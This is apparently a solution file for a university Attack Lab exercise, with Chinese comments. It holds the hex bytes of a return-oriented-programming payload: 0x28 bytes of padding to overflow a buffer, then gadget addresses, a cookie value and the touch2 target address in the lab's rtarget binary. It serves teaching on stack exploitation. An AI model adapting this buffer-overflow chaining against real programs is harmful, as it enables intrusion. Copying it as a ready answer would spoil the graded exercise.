# 前0x28个字符是申请的缓存区，要使它溢出，就填充0x28个0x00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 

# 打开attacklab.pdf 第11页 查找指令对应的encoding
# popq %rax 指令对应的十六进制为58
# 在rtarget文件中查找58，发现004019ab地址中存的正好是58
# 因此，将该地址004019ab写入栈中
ab 19 40 00 00 00 00 00 

# 将cookie文件存储的值 0x59b997fa 写入栈里
fa 97 b9 59 00 00 00 00 

# 以上两行操作，可以使堆栈中的数据0x59b997fa出栈，并将它赋值给rax

# movq %rax,%rdi 指令 对应十六进制48 89 c7
# 在rtarget文件中查找48 89 c7，可以查找004019a2地址存的刚好是它
# 因此将该地址004019a2写入栈中
a2 19 40 00 00 00 00 00

# 返回到 touch2地址  
# 查看ctarget文件，发现touch2地址是004017ec
# 因此将该地址004017ec写入栈中
ec 17 40 00 00 00 00 00 
